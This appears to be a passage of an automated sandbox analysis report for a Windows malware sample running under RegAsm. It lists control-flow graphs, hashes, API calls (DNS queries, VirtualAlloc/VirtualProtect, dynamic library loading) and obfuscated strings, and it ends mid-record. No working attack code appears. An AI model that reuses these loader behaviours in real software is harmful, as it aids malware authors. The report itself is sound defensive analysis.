18962->18946 18967 64c4730 18965->18967 18966 64c473b 18966->18946 18967->18966 18969 64c4770 2 API calls 18967->18969 18970 64c4761 2 API calls 18967->18970 18968 64c4754 18968->18946 18969->18968 18970->18968 18972 64c477b 18971->18972 18973 64c4789 18971->18973 18972->18962 18973->18972 18979 64c0260 18973->18979 18977 64c4770 18975->18977 18976 64c477b 18976->18962 18977->18976 18978 64c0260 2 API calls 18977->18978 18978->18976 18980 64c0270 18979->18980 18981 64c02dd 18980->18981 18982 64c07b0 CreateWindowExW 
CreateWindowExW 18980->18982 18981->18972 18982->18981

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 26 64c2710-64c272c 27 64c272e-64c273f 26->27 28 64c2742-64c27a3 26->28 37 64c277c-64c277e 28->37 38 64c2780-64c27af 37->38 39 64c27b1-64c27c4 37->39 39->37 42 64c27c6-64c283b 39->42 46 64c283d-64c2847 42->46 47 64c2874-64c2900 DnsQuery_A 42->47 46->47 49 64c2849-64c284b 46->49 57 64c2909-64c2956 47->57 58 64c2902-64c2908 47->58 50 64c284d-64c2857 49->50 51 64c286e-64c2871 49->51 53 64c2859 50->53 54 64c285b-64c286a 50->54 51->47 53->54 54->54 55 64c286c 54->55 55->51 63 64c2958-64c295c 57->63 64 64c2966-64c296a 57->64 58->57 63->64 65 64c295e 63->65 66 64c296c-64c296f 64->66 67 64c2979-64c297d 64->67 65->64 66->67 68 64c298e 67->68 69 64c297f-64c298b 67->69 71 64c298f 68->71 69->68 71->71
        Memory Dump Source
        • Source File: 00000003.00000002.513968175.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_64c0000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 36d2bac85079fd26bbdb6eebd69a17f0567ac80cb825f194865fe0e922054fe1
        • Instruction ID: 3a6990b83a87128883d35db871b93bd46521825587bf7c825846d80ad13b4c06
        • Opcode Fuzzy Hash: 36d2bac85079fd26bbdb6eebd69a17f0567ac80cb825f194865fe0e922054fe1
        • Instruction Fuzzy Hash: 11814775D00209CFDB50DFA9D880ADEBBB1FF49324F24852ED815AB350DBB49A46CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 72 52893e8-52893fd call 5288704 75 52893ff 72->75 76 5289413-5289417 72->76 128 5289405 call 5289660 75->128 129 5289405 call 5289670 75->129 77 5289419-5289423 76->77 78 528942b-528946c 76->78 77->78 83 5289479-5289487 78->83 84 528946e-5289476 78->84 79 528940b-528940d 79->76 80 5289548-5289608 79->80 121 528960a-528960d 80->121 122 5289610-528963b GetModuleHandleW 80->122 85 5289489-528948e 83->85 86 52894ab-52894ad 83->86 84->83 88 5289499 85->88 89 5289490-5289497 call 5288710 85->89 90 52894b0-52894b7 86->90 93 528949b-52894a9 88->93 89->93 94 52894b9-52894c1 90->94 95 52894c4-52894cb 90->95 93->90 94->95 97 52894d8-52894e1 call 5288720 95->97 98 52894cd-52894d5 95->98 102 52894ee-52894f3 97->102 103 52894e3-52894eb 97->103 98->97 105 5289511-5289515 102->105 106 52894f5-52894fc 102->106 103->102 126 5289518 call 5289968 105->126 127 5289518 call 5289958 105->127 106->105 107 52894fe-528950e call 5288730 call 5288740 106->107 107->105 110 528951b-528951e 113 5289520-528953e 110->113 114 5289541-5289547 110->114 113->114 121->122 123 528963d-5289643 122->123 124 5289644-5289658 122->124 123->124 126->110 127->110 128->79 129->79
        APIs
        • GetModuleHandleW.KERNEL32(00000000), ref: 0528962E
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: HandleModule
        • String ID:
        • API String ID: 4139908857-0
        • Opcode ID: 26ca5a99a1b696bacf892ec10484ffeaa4af3bb1c3cc516656d8a767fe401c8a
        • Instruction ID: 679185e6800bc8a720fd8d6bae56474a68351090ac296afdcb76447da8767358
        • Opcode Fuzzy Hash: 26ca5a99a1b696bacf892ec10484ffeaa4af3bb1c3cc516656d8a767fe401c8a
        • Instruction Fuzzy Hash: F6711470A11B058FD724EF6AD445B6ABBF1BF88204F00892DD58AD7B90D774E849CF91
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 130 528fb61-528fb88 131 528fb8a-528fbac 130->131 132 528fbec-528fc5e 130->132 133 528fbae-528fbd8 call 528da04 131->133 134 528fbe6-528fbea 131->134 135 528fc69-528fc70 132->135 136 528fc60-528fc66 132->136 140 528fbdd-528fbde 133->140 134->132 138 528fc7b-528fd1a CreateWindowExW 135->138 139 528fc72-528fc78 135->139 136->135 142 528fd1c-528fd22 138->142 143 528fd23-528fd5b 138->143 139->138 142->143 147 528fd68 143->147 148 528fd5d-528fd60 143->148 149 528fd69 147->149 148->147 149->149
        APIs
        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0528FD0A
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: CreateWindow
        • String ID:
        • API String ID: 716092398-0
        • Opcode ID: 51d178dc7a0d44b67cbed7918c1b2e9b893b805ef4a13db186e44e81c4fb3fa2
        • Instruction ID: b8e33509e291c295633d399b1bb592244c105efb94396bd1a4cf819e40be368e
        • Opcode Fuzzy Hash: 51d178dc7a0d44b67cbed7918c1b2e9b893b805ef4a13db186e44e81c4fb3fa2
        • Instruction Fuzzy Hash: 016123B1C14289AFCF02CFA9D984ADDBFB1FF49304F29815AE858AB261D7349945CF50
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 150 64c27bc-64c27c4 151 64c277c-64c277e 150->151 152 64c27c6-64c283b 150->152 153 64c2780-64c27af 151->153 154 64c27b1-64c27c4 151->154 157 64c283d-64c2847 152->157 158 64c2874-64c2900 DnsQuery_A 152->158 154->151 154->152 157->158 160 64c2849-64c284b 157->160 171 64c2909-64c2956 158->171 172 64c2902-64c2908 158->172 162 64c284d-64c2857 160->162 163 64c286e-64c2871 160->163 166 64c2859 162->166 167 64c285b-64c286a 162->167 163->158 166->167 167->167 169 64c286c 167->169 169->163 177 64c2958-64c295c 171->177 178 64c2966-64c296a 171->178 172->171 177->178 179 64c295e 177->179 180 64c296c-64c296f 178->180 181 64c2979-64c297d 178->181 179->178 180->181 182 64c298e 181->182 183 64c297f-64c298b 181->183 185 64c298f 182->185 183->182 185->185
        APIs
        • DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 064C28F0
        Memory Dump Source
        • Source File: 00000003.00000002.513968175.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_64c0000_RegAsm.jbxd
        Similarity
        • API ID: Query_
        • String ID:
        • API String ID: 428220571-0
        • Opcode ID: 2dfecb64ff034d644c14c69990b6f5e42e2428027406dcb08868f8ce85dc95c8
        • Instruction ID: 49f88f14014a867960b988af847a4afce04408f2572675cb41b5f105e27e33ee
        • Opcode Fuzzy Hash: 2dfecb64ff034d644c14c69990b6f5e42e2428027406dcb08868f8ce85dc95c8
        • Instruction Fuzzy Hash: 2B511375D002598FDB50CFA9D880ADEBBB1BF48714F24812EE814AB350DBB49A46CF90
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 186 528da04-528fc5e 188 528fc69-528fc70 186->188 189 528fc60-528fc66 186->189 190 528fc7b-528fd1a CreateWindowExW 188->190 191 528fc72-528fc78 188->191 189->188 193 528fd1c-528fd22 190->193 194 528fd23-528fd5b 190->194 191->190 193->194 198 528fd68 194->198 199 528fd5d-528fd60 194->199 200 528fd69 198->200 199->198 200->200
        APIs
        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0528FD0A
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: CreateWindow
        • String ID:
        • API String ID: 716092398-0
        • Opcode ID: aa77246ce5ea0f3eae35c8e6a5f2e69f5fc739f2f3bb96bdbe3fd2c7b15f9406
        • Instruction ID: f033ebde3298e0cb705e22933d8ee88c673f6c8136c181456b18400fd3c231b8
        • Opcode Fuzzy Hash: aa77246ce5ea0f3eae35c8e6a5f2e69f5fc739f2f3bb96bdbe3fd2c7b15f9406
        • Instruction Fuzzy Hash: 2351BEB1D10309EFDB14CF99C984AEEBBB5BF48314F24812AE919AB250D7749985CF90
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 201 528a14c-528bd94 DuplicateHandle 203 528bd9d-528bdba 201->203 204 528bd96-528bd9c 201->204 204->203
        APIs
        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0528BCC6,?,?,?,?,?), ref: 0528BD87
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: DuplicateHandle
        • String ID:
        • API String ID: 3793708945-0
        • Opcode ID: 8de46ace49c77b8e7526bd75f5a8eafbf8009468d7609ad9acfb362cef249d3e
        • Instruction ID: fad9c2dadc97201589dc4255f08b3275b16e1488c5b5e1d32f46d57f86967bc4
        • Opcode Fuzzy Hash: 8de46ace49c77b8e7526bd75f5a8eafbf8009468d7609ad9acfb362cef249d3e
        • Instruction Fuzzy Hash: 2121E3B5904249AFDB10CF99D884AEEBBF4FF48314F14841AE958A3350D378A944CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 207 528bcf9 208 528bd00-528bd94 DuplicateHandle 207->208 209 528bd9d-528bdba 208->209 210 528bd96-528bd9c 208->210 210->209
        APIs
        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0528BCC6,?,?,?,?,?), ref: 0528BD87
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: DuplicateHandle
        • String ID:
        • API String ID: 3793708945-0
        • Opcode ID: 3874517441988043b1902305824c59456bd8e65c40230f43b747dea86abee866
        • Instruction ID: e988a6e2fa1036fce4ff44135b3b44c35032a40c83b8b0918ea94d8e599ce08f
        • Opcode Fuzzy Hash: 3874517441988043b1902305824c59456bd8e65c40230f43b747dea86abee866
        • Instruction Fuzzy Hash: 3421E5B5900249AFDB10CF99D884AEEBFF4EB49314F14841AE954A3250D378A944CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 213 5288768-5289890 215 5289898-52898c7 LoadLibraryExW 213->215 216 5289892-5289895 213->216 217 52898c9-52898cf 215->217 218 52898d0-52898ed 215->218 216->215 217->218
        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,052896A9,00000800,00000000,00000000), ref: 052898BA
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: 6914461865381251d79c41f1f89a6ea53ed22ebe90a9d4561228f45447392709
        • Instruction ID: 6d2b7347acbbd5fb693f5d7ed6ba2a1c3e0b9a9157509b97c847d59bd47236d7
        • Opcode Fuzzy Hash: 6914461865381251d79c41f1f89a6ea53ed22ebe90a9d4561228f45447392709
        • Instruction Fuzzy Hash: CA1106B59042499FCB10DF9AC844BEEFBF4EF48314F14842AD519B7640C374A545CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 221 5289849-5289890 222 5289898-52898c7 LoadLibraryExW 221->222 223 5289892-5289895 221->223 224 52898c9-52898cf 222->224 225 52898d0-52898ed 222->225 223->222 224->225
        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,052896A9,00000800,00000000,00000000), ref: 052898BA
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: 7c094254a81cc1602147c503eac6eeaeff691de6d3613cd0844543672d88cd64
        • Instruction ID: 1b2143060366e6f7ee358a740b16bf1c2ce4aef259e5df3ff6da8fdf8266352b
        • Opcode Fuzzy Hash: 7c094254a81cc1602147c503eac6eeaeff691de6d3613cd0844543672d88cd64
        • Instruction Fuzzy Hash: 1A1114B6C042098FCB10CFA9C848BEEFBF4AF48314F15882AD529B7600C378A545CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 228 52895c8-5289608 229 528960a-528960d 228->229 230 5289610-528963b GetModuleHandleW 228->230 229->230 231 528963d-5289643 230->231 232 5289644-5289658 230->232 231->232
        APIs
        • GetModuleHandleW.KERNEL32(00000000), ref: 0528962E
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: HandleModule
        • String ID:
        • API String ID: 4139908857-0
        • Opcode ID: a6838614d8099e2a5f4f212b549def7b4adef180bb81132a7752eef3ef77bd84
        • Instruction ID: 266286fefa2b94afca845daf0a2b82817f66d47f30bec6f263d7f0c21b4d2d74
        • Opcode Fuzzy Hash: a6838614d8099e2a5f4f212b549def7b4adef180bb81132a7752eef3ef77bd84
        • Instruction Fuzzy Hash: 3311E0B5C002598FCB10CF9AC444BEEFBF4AF89214F14C41AD829B7640D378A545CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 234 528da3c-528feaa SetWindowLongW 236 528feac-528feb2 234->236 237 528feb3-528fec7 234->237 236->237
        APIs
        • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0528FE28,?,?,?,?), ref: 0528FE9D
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: LongWindow
        • String ID:
        • API String ID: 1378638983-0
        • Opcode ID: 737ce399f674d90fc27891b280b2adf5584039ed4eb4429ef9320132e60ba098
        • Instruction ID: 7f6139a975a9de710614797fc51bde47ecc4a65f5d050c692a1c1f26266e933e
        • Opcode Fuzzy Hash: 737ce399f674d90fc27891b280b2adf5584039ed4eb4429ef9320132e60ba098
        • Instruction Fuzzy Hash: E11103B59102499FDB10DF99D584BEEFBF8EB48324F20841AE919B7341C3B4A944CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 239 528fe38-528feaa SetWindowLongW 240 528feac-528feb2 239->240 241 528feb3-528fec7 239->241 240->241
        APIs
        • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0528FE28,?,?,?,?), ref: 0528FE9D
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: LongWindow
        • String ID:
        • API String ID: 1378638983-0
        • Opcode ID: b8718fb7163689ad5abf35e5f54f158a54b2fca5c377606b7fe7173cf3b2a5c6
        • Instruction ID: 2cc1ad669782c11fb1db5ae85cc3dca28c706c54ceba752469499283f5989e01
        • Opcode Fuzzy Hash: b8718fb7163689ad5abf35e5f54f158a54b2fca5c377606b7fe7173cf3b2a5c6
        • Instruction Fuzzy Hash: 251106B5800249CFDB10CF99D589BEEFBF4EB48314F24881AD955B3640C374A544CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000003.00000002.509616179.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_f5d000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8e645f06323adac951954ce958b7c73a4c0e68b3ae77ae6c9e8148f8e12f7448
        • Instruction ID: 09fe0bdbcd644265792779c14b8a499cc2eaa3620440b2258b667d6c9d0e3650
        • Opcode Fuzzy Hash: 8e645f06323adac951954ce958b7c73a4c0e68b3ae77ae6c9e8148f8e12f7448
        • Instruction Fuzzy Hash: BE2106B1905240DFDB25CF14D8C0B26BB61FB98329F28C569DE054B216C336D859EBA2
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000003.00000002.509678155.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_f6d000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 77af7af3712ead8348e3f0c896e24769011365aecd88a4086b834aceca7b9a88
        • Instruction ID: 47a9bb846b6adfd346c709a87c59194e07c6b31aaec42f8027d0e1c5268223eb
        • Opcode Fuzzy Hash: 77af7af3712ead8348e3f0c896e24769011365aecd88a4086b834aceca7b9a88
        • Instruction Fuzzy Hash: 2121B375B08240EFDB14CF14D8C4B26BB65EB88328F24C569D9494B24AC33AD846DBA1
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000003.00000002.509678155.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_f6d000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 66b7894a2f1f3a16001a6845a4eaf50f8e8dff5a4c9319d6187a37b8716f9129
        • Instruction ID: c5829f5d5d8667bc86f42b1da2e786d060ea36600de519fc62dc893a06a63381
        • Opcode Fuzzy Hash: 66b7894a2f1f3a16001a6845a4eaf50f8e8dff5a4c9319d6187a37b8716f9129
        • Instruction Fuzzy Hash: B52153759093C09FCB12CF24D994B15BF71EB46314F28C5EAD8498B657C33AD80ACB62
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000003.00000002.509616179.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_f5d000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5150f7a57a8d53df84542f52b091e2a3c21df0421a9b8367837477cfcd62eb91
        • Instruction ID: 900641c66f3b925384d13cf8d725f2fa5dfed29fb4960079318e593330b38496
        • Opcode Fuzzy Hash: 5150f7a57a8d53df84542f52b091e2a3c21df0421a9b8367837477cfcd62eb91
        • Instruction Fuzzy Hash: 2611AF76804280CFCB16CF14D9C4B16BF61FB94324F28C6A9DD054B616C33AD85ADBA2
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        APIs
        • GetConsoleWindow.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000080), ref: 00AB16FA
        • SetWindowPos.USER32(00000000), ref: 00AB1701
        • VirtualProtect.KERNELBASE(32342DD0,000002E2,00000040,?), ref: 00AB1EE2
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: Window$ConsoleProtectVirtual
        • String ID: s=$,52$-9$0852$952$99_1$99cb$99fd$99fd$9S1Z$9obc$S=]2$gJ0xZISNT1QdY$oS2Z$M,=
        • API String ID: 2778018546-69423270
        • Opcode ID: cea02692d4d5dae1178001425dd2090182ee1401fc29c1d42fa345ab55f34d4b
        • Instruction ID: d510442d84501647f97bd337e3c1679d7287c050c6cf90f6aa591e224b8a27d5
        • Opcode Fuzzy Hash: cea02692d4d5dae1178001425dd2090182ee1401fc29c1d42fa345ab55f34d4b
        • Instruction Fuzzy Hash: 81728AB2B543598BEB60CFB9DDC978ABAB0F715300F4045B8D548EB785D7789A858F00
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 482 ab26fa-ab2705 SetUnhandledExceptionFilter
        C-Code - Quality: 100%
        #include <windows.h>

        /* Filter routine at 0x00AB2706; its body is not part of this excerpt. */
        LONG WINAPI E00AB2706(EXCEPTION_POINTERS *info);

        /* Installs E00AB2706 as the process-wide unhandled-exception filter
           and returns the previously installed filter. */
        LPTOP_LEVEL_EXCEPTION_FILTER E00AB26FA(void) {
            LPTOP_LEVEL_EXCEPTION_FILTER _t1;

            _t1 = SetUnhandledExceptionFilter(E00AB2706); // executed
            return _t1;
        }





        APIs
        • SetUnhandledExceptionFilter.KERNELBASE(Function_00002706,00AB2097), ref: 00AB26FF
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: ca51bbea88f5ac8503704557342a54a00557fa7c84e3450247de3c4d69ce4034
        • Instruction ID: 2f28c79fa198a18b9df90005cdbd1cf7e8fb5daae5a7955380944dd4d9fdc971
        • Opcode Fuzzy Hash: ca51bbea88f5ac8503704557342a54a00557fa7c84e3450247de3c4d69ce4034
        • Instruction Fuzzy Hash:
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 12 10d1fb5-10d2e1b call 10d4ab5 15 10d2e1d-10d2e29 call 10d4ab5 12->15 16 10d2e2b-10d2e30 12->16 15->16 20 10d2e35-10d301c call 10d0005 VirtualAlloc * 8 call 10d1f65 * 8 call 10d46c5 * 2 call 10d4ab5 15->20 18 10d3335-10d333a 16->18 45 10d302c-10d3043 call 10d46c5 20->45 46 10d301e-10d3023 call 10d4ab5 20->46 51 10d3046-10d3052 call 10d4c15 45->51 49 10d3028-10d302a 46->49 49->45 49->51 54 10d3054-10d305e call 10d4c15 call 10d1e75 51->54 55 10d3063-10d306f call 10d4c15 51->55 54->55 61 10d30cd-10d30e3 55->61 62 10d3071-10d3095 call 10d1635 55->62 66 10d30ec-10d30f8 call 10d4c15 61->66 67 10d30e5-10d30e7 61->67 62->61 68 10d3097-10d30a3 call 10d4ab5 62->68 73 10d30fa-10d312d call 10d46c5 call 10d0265 66->73 74 10d3132-10d313e call 10d4c15 66->74 67->18 68->61 75 10d30a5-10d30b1 call 10d4ab5 68->75 93 10d32c0-10d32e1 call 10d1f15 73->93 82 10d3178-10d3184 call 10d4c15 74->82 83 10d3140-10d3158 call 10d46c5 74->83 75->61 85 10d30b3-10d30c5 call 10d46c5 75->85 95 10d31be-10d31ca call 10d4c15 82->95 96 10d3186-10d31b9 call 10d46c5 call 10d0265 82->96 91 10d315d-10d3173 call 10d0265 83->91 90 10d30ca 85->90 90->61 91->93 104 10d32ec-10d32f0 93->104 105 10d31cc-10d31ff call 10d46c5 call 10d0265 95->105 106 10d3204-10d3210 call 10d4c15 95->106 96->93 108 10d3328-10d3330 ExitProcess 104->108 109 10d32f2-10d330c call 10d1985 104->109 105->93 120 10d3247-10d3253 call 10d4c15 106->120 121 10d3212-10d3245 call 10d46c5 call 10d0265 106->121 108->18 114 10d3311-10d3314 109->114 117 10d3318-10d331c 114->117 118 10d3316 114->118 122 10d331e 117->122 123 10d3326 117->123 118->108 130 10d328a-10d32bb call 10d46c5 call 10d0265 120->130 131 10d3255-10d3288 call 10d46c5 call 10d0265 120->131 121->93 122->123 123->104 130->93 131->93
        APIs
        • VirtualAlloc.KERNELBASE(00000000,00000002,00003000,00000004,E84126B8,388F3ADB), ref: 010D2E5B
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 010D2E71
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 010D2E87
        • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 010D2E9B
        • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 010D2EAF
        • VirtualAlloc.KERNELBASE(00000000,0000003C,00003000,00000004), ref: 010D2EC3
        • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 010D2ED7
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 010D2EED
          • Part of subcall function 010D46C5: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00003000,VirtualAlloc,00003000,VirtualFree,00000000), ref: 010D4863
        • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6B68C4C6), ref: 010D332A
        Memory Dump Source
        • Source File: 00000007.00000002.301067751.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_10d0000_ople.jbxd
        Similarity
        • API ID: AllocVirtual$ExitProcess
        • String ID:
        • API String ID: 2301755047-0
        • Opcode ID: a118c34d102690ef0c4d506b9dcacaf28342d3ffce4d2a2770a5fc4f27c1cb82
        • Instruction ID: ced4b79273daafc0ab3c84676ce694e7d2b4d436aebc662bdf3ef55e1aa4e3a1
        • Opcode Fuzzy Hash: a118c34d102690ef0c4d506b9dcacaf28342d3ffce4d2a2770a5fc4f27c1cb82
        • Instruction Fuzzy Hash: B8A23220A14758D6EB20DF64DC54BDEB236EF68700F1050E9920DEB3E5E67A4F81CB5A
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph (rendered graph omitted)
        APIs
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00003000,VirtualAlloc,00003000,VirtualFree,00000000), ref: 010D4863
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.301067751.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_10d0000_ople.jbxd
        Similarity
        • API ID: AllocVirtual
        • String ID: CallWindowProcW$LoadLibraryW$VirtualAlloc$VirtualFree
        • API String ID: 4275171209-840194956
        • Opcode ID: db5a3faaeca2214f847324c64107c7e948738704fc90c88045da66bf3d03da6a
        • Instruction ID: bc08e8c46c1f417394dfdf05d8c87dce487f2a22f7a02074595b31c0c0e3087f
        • Opcode Fuzzy Hash: db5a3faaeca2214f847324c64107c7e948738704fc90c88045da66bf3d03da6a
        • Instruction Fuzzy Hash: B9A11970D083C8DAEB11CBE8C448BEDBFB2AF25704F144199D584BB382D7BA5554CB66
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph (rendered graph omitted)
        APIs
        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010D3416
        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010D362D
        Memory Dump Source
        • Source File: 00000007.00000002.301067751.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_10d0000_ople.jbxd
        Similarity
